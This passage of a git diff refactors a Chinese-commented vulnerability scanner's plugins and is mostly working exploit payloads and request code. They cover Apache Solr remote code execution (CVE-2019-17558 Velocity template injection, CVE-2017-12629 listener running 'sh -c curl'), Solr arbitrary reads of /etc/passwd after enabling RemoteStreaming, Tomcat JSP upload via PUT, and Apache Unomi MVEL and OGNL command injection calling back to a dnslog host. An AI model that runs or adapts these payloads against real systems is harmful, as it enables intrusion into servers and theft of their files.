+            {'path': "select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheSolr',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-17558',
+        }
+
+        if not config.get('Solr-params'):
+            enable(client)                      # * 此漏洞需要启用Solr的RemoteStreaming功能
+        if not config.get('Solr-params'):
+            return None                         # * 如果启用失败, 退出
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            RCEcommand = 'echo ' + random_str
+
+            path = payload['path'].format(DBNAME=config.get('Solr-db_name'), RCECOMMAND=RCEcommand)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, random_str)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py b/payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py
new file mode 100644
index 0000000..785a297
--- /dev/null
+++ b/payloads/ApacheSolr/apache-solr-cve-2021-27905-ssrf-fileread.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Solr SSRF/任意文件读取
+    CVE-2021-27905
+        Payload: https://vulhub.org/#/environments/solr/Remote-Streaming-Fileread/
+                 https://www.freebuf.com/vuls/279278.html
+
+当Solr不启用身份验证时, 攻击者可以直接制造请求以启用特定配置, 最终导致SSRF或任意文件读取
+'''
+
+from payloads.ApacheSolr.tool_enable import enable
+from lib.initial.config import config
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # * SSRF
+            # {'path': 'solr/{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'},
+            # {'path': '{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'},
+            # {'path': 'replication?command=fetchindex&masterUrl=http://DNSDOMAIN'},
+            # * FileRead
+            {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'},
+            {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'},
+            {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'},
+            {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'},
+            {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'},
+            {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'},
+            {'path': 'debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'},
+            {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'},
+            {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheSolr',
+            'vul_type': 'SSRF/FileRead',
+            'vul_id': 'CVE-2021-27905',
+        }
+
+        if not config.get('Solr-RemoteStreaming'):
+            enable(client)                              # * 开启Solr的RemoteStreaming
+        if not config.get('Solr-RemoteStreaming'):
+            return None                                 # * 如果开启失败, 退出
+
+        for payload in self.payloads:                            # * Payload
+            path = payload['path'].format(DBNAME=config.get('Solr-db_name'))    # * Path
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheSolr/cve_2017_12629.py b/payloads/ApacheSolr/cve_2017_12629.py
deleted file mode 100644
index 80135a9..0000000
--- a/payloads/ApacheSolr/cve_2017_12629.py
+++ /dev/null
@@ -1,112 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-# from lib.tool import check
-from time import sleep
-
-random_name = random_md5()
-cve_2017_12629_payloads = [
-    {
-        'path': 'solr/{DBNAME}/config',
-        'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}',
-        'path-2': 'solr/{DBNAME}/update',
-        'data-2': '[{"id":"test"}]',
-    },
-    {
-        'path': 'solr/{DBNAME}/config',
-        'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}',
-        'path-2': 'solr/{DBNAME}/update',
-        'data-2': '[{"id":"test"}]',
-    },
-    {
-        'path': 'solr/{DBNAME}/config',
-        'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}',
-        'path-2': 'solr/{DBNAME}/update',
-        'data-2': '[{"id":"test"}]',
-    },
-    {
-        'path': 'config',
-        'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl DNSDOMAIN"]}}',
-        'path-2': 'update',
-        'data-2': '[{"id":"test"}]',
-    },
-    {
-        'path': 'config',
-        'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 4 DNSDOMAIN"]}}',
-        'path-2': 'update',
-        'data-2': '[{"id":"test"}]',
-    },
-    {
-        'path': 'config',
-        'data': '{"add-listener":{"event":"postCommit","name":"' + random_name + '","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping DNSDOMAIN"]}}',
-        'path-2': 'update',
-        'data-2': '[{"id":"test"}]',
-    }
-]
-
-def cve_2017_12629_scan(self, clients):
-    ''' 7.1.0之前版本总共爆出两个漏洞: XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)
-            二者可以连接成利用链, 编号均为CVE-2017-12629
-    '''
-    client = clients.get('reqClient')
-    sessid = '60491ea49ab435a2cc1acb7aa93e3409'
-
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2017-12629',
-    }
-
-    headers = {
-        'Content-Type': 'application/json'
-    }
-
-    self.enable(client)                                         # * 需要获取数据库名称 DBname
-    if not self.db_name:
-        return None
-
-    dnslog_md = random_md5()                                   # * 随机md5值, 8位
-    dnslog_domain = dnslog_md + '.' + dns.domain(sessid)       # * dnslog/ceye域名
-
-    for payload in cve_2017_12629_payloads:
-        path = payload['path'].format(DBNAME=self.db_name)
-        data = payload['data'].replace('DNSDOMAIN', dnslog_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-        
-        if ('"WARNING":"This response format is experimental.  It is likely to change in the future."' in res.text):
-            path_2 = payload['path-2'].format(DBNAME=self.db_name)
-            data_2 = payload['data-2']
-            
-            res2 = client.request(
-                'post',
-                path_2,
-                data=data_2, 
-                headers=headers,
-                allow_redirects=False,
-                vul_info=vul_info
-            )
-            if res2 is None:
-                continue
-
-            sleep(10)                                    # * solr响应太慢啦!
-            if (dns.result(dnslog_md, sessid)):
-                results = {
-                    'Target': res.request.url,
-                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                    'Request': res,
-                    'Request-2': res2
-                }
-                return results
-    return None
diff --git a/payloads/ApacheSolr/cve_2019_17558.py b/payloads/ApacheSolr/cve_2019_17558.py
deleted file mode 100644
index 8d410fa..0000000
--- a/payloads/ApacheSolr/cve_2019_17558.py
+++ /dev/null
@@ -1,57 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2019_17558_payloads = [
-    {
-        'path': "solr/{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end",
-    },
-    {
-        'path': "{DBNAME}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end",
-    },
-    {
-        'path': "select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{RCECOMMAND}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end",
-    },
-]
-
-def cve_2019_17558_scan(self, clients):
-    ''' 5.0.0版本至8.3.1版本中存在输入验证错误漏洞, 
-        攻击者可借助自定义的Velocity模板功能, 利用Velocity-SSTI漏洞在Solr系统上执行任意代码
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-17558',
-    }
-
-    self.enable(client)                             # * 此漏洞需要启用Solr的RemoteStreaming功能
-    if not self.params:
-        return None
-
-    for payload in cve_2019_17558_payloads:
-        random_str = random_md5(6)
-        RCEcommand = 'echo ' + random_str
-
-        path = payload['path'].format(DBNAME=self.db_name, RCECOMMAND=RCEcommand)
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res(res.text, random_str)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheSolr/cve_2021_27905.py b/payloads/ApacheSolr/cve_2021_27905.py
deleted file mode 100644
index 7d70bb9..0000000
--- a/payloads/ApacheSolr/cve_2021_27905.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2021_27905_payloads = [
-    # * SSRF
-    # {'path': 'solr/{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'},
-    # {'path': '{DBNAME}/replication?command=fetchindex&masterUrl=http://DNSDOMAIN'},
-    # {'path': 'replication?command=fetchindex&masterUrl=http://DNSDOMAIN'},
-    # * FileRead
-    {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'},
-    {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'},
-    {'path': 'solr/{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'},
-    {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'},
-    {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'},
-    {'path': '{DBNAME}/debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'},
-    {'path': 'debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'},
-    {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:\Windows\System32\drivers\etc\hosts'},
-    {'path': 'debug/dump?param=ContentStreams&stream.url=file:///C:/Windows/System32/drivers/etc/hosts'},
-]
-
-def cve_2021_27905_scan(self, clients):
-    ''' 当Solr不启用身份验证时, 攻击者可以直接制造请求以启用特定配置, 最终导致SSRF或任意文件读取 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'SSRF/FileRead',
-        'vul_id': 'CVE-2021-27905',
-    }
-
-    self.enable(client)                                         # * 开启Solr的RemoteStreaming
-    if not self.RemoteStreaming:
-        return None
-
-    for payload in cve_2021_27905_payloads:                     # * Payload
-        path = payload['path'].format(DBNAME=self.db_name)      # * Path
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheSolr/main.py b/payloads/ApacheSolr/main.py
deleted file mode 100644
index 28f1ed0..0000000
--- a/payloads/ApacheSolr/main.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    ApacheSolr扫描类: 
-        1. Solr SSRF/任意文件读取
-            CVE-2021-27905
-                Payload: https://vulhub.org/#/environments/solr/Remote-Streaming-Fileread/
-                         https://www.freebuf.com/vuls/279278.html
-
-        2. Solr 远程命令执行
-            CVE-2017-12629
-                Payload: https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/
-
-        3. Solr Velocity 注入远程命令执行
-            CVE-2019-17558
-                Payload: https://vulhub.org/#/environments/solr/CVE-2019-17558/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheSolr.tool_enable import enable
-from payloads.ApacheSolr.cve_2017_12629 import cve_2017_12629_scan
-from payloads.ApacheSolr.cve_2019_17558 import cve_2019_17558_scan
-from payloads.ApacheSolr.cve_2021_27905 import cve_2021_27905_scan
-
-class Solr():
-    def __init__(self):
-        self.app_name = 'ApacheSolr'
-
-        self.db_name = ''
-        self.RemoteStreaming = False
-        self.params = False
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target=self.{}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=self.cve_2017_12629_scan, clients=clients),
-            thread(target=self.cve_2019_17558_scan, clients=clients),
-            thread(target=self.cve_2021_27905_scan, clients=clients),
-        ]
-
-Solr.enable = enable
-Solr.cve_2017_12629_scan = cve_2017_12629_scan
-Solr.cve_2019_17558_scan = cve_2019_17558_scan
-Solr.cve_2021_27905_scan = cve_2021_27905_scan
-
-solr = Solr()
\ No newline at end of file
diff --git a/payloads/ApacheSolr/tool_enable.py b/payloads/ApacheSolr/tool_enable.py
index f8b1eed..7c3e210 100644
--- a/payloads/ApacheSolr/tool_enable.py
+++ b/payloads/ApacheSolr/tool_enable.py
@@ -1,6 +1,7 @@
 #!/usr/bin/env python3
 # -*- coding:utf-8 -*-
 
+from lib.initial.config import config
 import re
 
 config_data_base = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
@@ -27,11 +28,11 @@
     }
 ]
 
-def enable(self, client):
+def enable(client):
     ''' 用于开启Solr的RemoteStreaming或自定义模板(params.resource.loader.enabled) '''
     vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'Solr',
+        'app_name': 'ApacheSolr',
+        'vul_type': 'Solr-Tool',
         'vul_id': 'Solr-enable',
     }
 
@@ -40,7 +41,7 @@ def enable(self, client):
     }
     
     for payload in enable_payloads:
-        if self.params:
+        if config.get('Solr-params'):
             return
 
         core_path = payload['core_path']
@@ -56,17 +57,17 @@ def enable(self, client):
         if res1 is None:
             return
         
-        db_name = re.search(r'"name":".+"', res1.text, re.M|re.I)        # * 如果存在solr的数据库名称
+        db_name = re.search(r'"name":".+"', res1.text, re.M|re.I)       # * 如果存在solr的数据库名称
         if db_name:
             db_name = db_name.group()
             db_name = db_name.replace('"name":', '')
-            self.db_name = db_name.strip('"')                            # * 只保留双引号内的数据库名称
+            config.set('Solr-db_name', db_name.strip('"'))              # * 只保留双引号内的数据库名称
             
-        if self.db_name:
+        if config.get('Solr-db_name'):
             # todo 2. 开启RemoteStreaming
             res2 = client.request(
                 'post',
-                config_path.format(self.db_name),
+                config_path.format(config.get('Solr-db_name')),
                 data=config_data,
                 headers=headers,
                 allow_redirects=False,
@@ -76,12 +77,12 @@ def enable(self, client):
                 return
             
             if (res2.status_code == 200):
-                self.RemoteStreaming = True
-                
+                config.set('Solr-RemoteStreaming', True)
+
             # todo 3. 开启params.resource.loader.enabled
             res3 = client.request(
                 'post',
-                config_path.format(self.db_name),
+                config_path.format(config.get('Solr-db_name')),
                 data=params_data,
                 headers=headers,
                 allow_redirects=False,
@@ -89,7 +90,7 @@ def enable(self, client):
             )
             if res3 is None:
                 return
-            
+
             if (res3.status_code == 200):
-                self.params = True
+                config.set('Solr-params', True)
     return None
diff --git a/payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py b/payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py
new file mode 100644
index 0000000..b848d91
--- /dev/null
+++ b/payloads/ApacheTomcat/apache-tomcat-cve-2017-12615-fileupload.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Tomcat PUT方法任意文件写入漏洞
+    CVE-2017-12615
+        Payload: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/
+                 https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
+
+Tomcat PUT方法任意文件写入漏洞
+    PUT方法可用, 上传未做过滤, 可以写入任意文件
+'''
+
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': '{PATH}.jsp/',
+                'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
+                'path-2': '{PATH}.jsp'
+            },
+            {
+                'path': '{PATH}.jsp%20',
+                'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
+                'path-2': '{PATH}.jsp'
+            },
+            {
+                'path': '{PATH}.jsp::$DATA',
+                'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
+                'path-2': '{PATH}.jsp'
+            },
+            {
+                'path': '{PATH}.jsp',
+                'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
+                'path-2': '{PATH}.jsp'
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheTomcat',
+            'vul_type': 'File-Upload',
+            'vul_id': 'CVE-2017-12615',
+        }
+
+        for payload in self.payloads:                # * Payload
+            random_str_1 = random_md5(6)
+            random_str_2 = random_md5(6)
+            
+            path = payload['path'].format(PATH=random_str_1)        # * Path
+            data = payload['data'].format(TEXT=random_str_2)        # * Data
+            path_2 = payload['path-2'].format(PATH=random_str_1)    # * Path-2
+
+            res = client.request(
+                'put',
+                path,
+                data=data,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            res2 = client.request(
+                'get',
+                path_2,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            text = '<h1>' + random_str_2 + '</h1>'
+            
+            if ((res2.status_code == 200) and (text in res2.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Verify': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res,
+                    'Request-2': res2
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheTomcat/cve_2017_12615.py b/payloads/ApacheTomcat/cve_2017_12615.py
deleted file mode 100644
index 78b7224..0000000
--- a/payloads/ApacheTomcat/cve_2017_12615.py
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-# from lib.tool import check
-# import re
-
-cve_2017_12615_payloads = [
-    {
-        'path': '{PATH}.jsp/',
-        'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
-        'path-2': '{PATH}.jsp'
-    },
-    {
-        'path': '{PATH}.jsp%20',
-        'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
-        'path-2': '{PATH}.jsp'
-    },
-    {
-        'path': '{PATH}.jsp::$DATA',
-        'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
-        'path-2': '{PATH}.jsp'
-    },
-    {
-        'path': '{PATH}.jsp',
-        'data': '<% out.println("<h1>{TEXT}</h1>"); %>',
-        'path-2': '{PATH}.jsp'
-    }
-]
-
-def cve_2017_12615_scan(clients):
-    ''' Tomcat PUT方法任意文件写入漏洞
-            PUT方法可用, 上传未做过滤, 可以写入任意文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ApacheTomcat',
-        'vul_type': 'File-Upload',
-        'vul_id': 'CVE-2017-12615',
-    }
-
-    for payload in cve_2017_12615_payloads:                 # * Payload
-        random_str_1 = random_md5(6)
-        random_str_2 = random_md5(6)
-        
-        path = payload['path'].format(PATH=random_str_1)        # * Path
-        data = payload['data'].format(TEXT=random_str_2)        # * Data
-        path_2 = payload['path-2'].format(PATH=random_str_1)    # * Path-2
-
-        res = client.request(
-            'put',
-            path,
-            data=data,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        res2 = client.request(
-            'get',
-            path_2,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        text = '<h1>' + random_str_2 + '</h1>'
-        
-        if ((res2.status_code == 200) and (text in res2.text)):
-            results = {
-                'Target': res.request.url,
-                'Verify': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res,
-                'Request-2': res2
-            }
-            return results
-    return None
diff --git a/payloads/ApacheTomcat/main.py b/payloads/ApacheTomcat/main.py
deleted file mode 100644
index 8b77671..0000000
--- a/payloads/ApacheTomcat/main.py
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    ApacheTomcat扫描类: 
-        Tomcat PUT方法任意文件写入漏洞
-            CVE-2017-12615
-                Payload: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/
-                         https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheTomcat.cve_2017_12615 import cve_2017_12615_scan
-
-class Tomcat():
-    def __init__(self):
-        self.app_name = 'ApacheTomcat'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2017_12615_scan, clients=clients),
-        ]
-
-tomcat = Tomcat()
\ No newline at end of file
diff --git a/payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py b/payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py
new file mode 100644
index 0000000..cb03b01
--- /dev/null
+++ b/payloads/ApacheUnomi/apache-unomi-cve-2020-13942-rce.py
@@ -0,0 +1,106 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache Unomi 是一个基于标准的客户数据平台(CDP, Customer Data Platform)
+用于管理在线客户和访客等信息, 以提供符合访客隐私规则的个性化体验
+    Apache Unomi 远程表达式代码执行
+        CVE-2020-13942
+            Payload: https://vulhub.org/#/environments/unomi/CVE-2020-13942/
+
+在Apache Unomi 1.5.1级以前版本中, 
+    存在一处表达式注入漏洞, 远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        payload_mvel = '''{"filters": [{"id": "sample","filters": [{"condition": { "parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"COMMANDDNSDOMAIN\\");"},"type": "profilePropertyCondition"}}]}],"sessionId": "sample"}'''
+        payload_ognl = '''{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"COMMANDDNSDOMAIN\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"sample"}'''
+
+        self.payloads = [
+            # ! MVEL表达式
+            {
+                'path': 'context.json',
+                'data': payload_mvel.replace('COMMAND', 'curl ')
+            },
+            {
+                'path': 'context.json',
+                'data': payload_mvel.replace('COMMAND', 'curl http://')
+            },
+            {
+                'path': 'context.json',
+                'data': payload_mvel.replace('COMMAND', 'ping -c 4 ')
+            },
+            {
+                'path': 'context.json',
+                'data': payload_mvel.replace('COMMAND', 'ping ')
+            },
+            # ! OGNL表达式
+            {
+                'path': 'context.json',
+                'data': payload_ognl.replace('COMMAND', 'curl ')
+            },
+            {
+                'path': 'context.json',
+                'data': payload_ognl.replace('COMMAND', 'curl http://')
+            },
+            {
+                'path': 'context.json',
+                'data': payload_ognl.replace('COMMAND', 'ping -c 4 ')
+            },
+            {
+                'path': 'context.json',
+                'data': payload_ognl.replace('COMMAND', 'ping ')
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '69e506227812d37756fdf19a444de2b5'
+        
+        vul_info = {
+            'app_name': 'ApacheUnomi',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2020-13942',
+        }
+
+        headers = {
+            'Content-Type': 'application/json'
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheUnomi/cve_2020_13942.py b/payloads/ApacheUnomi/cve_2020_13942.py
deleted file mode 100644
index 2254358..0000000
--- a/payloads/ApacheUnomi/cve_2020_13942.py
+++ /dev/null
@@ -1,92 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-payload_mvel = '''{"filters": [{"id": "sample","filters": [{"condition": { "parameterValues": {"": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"COMMANDDNSDOMAIN\\");"},"type": "profilePropertyCondition"}}]}],"sessionId": "sample"}'''
-
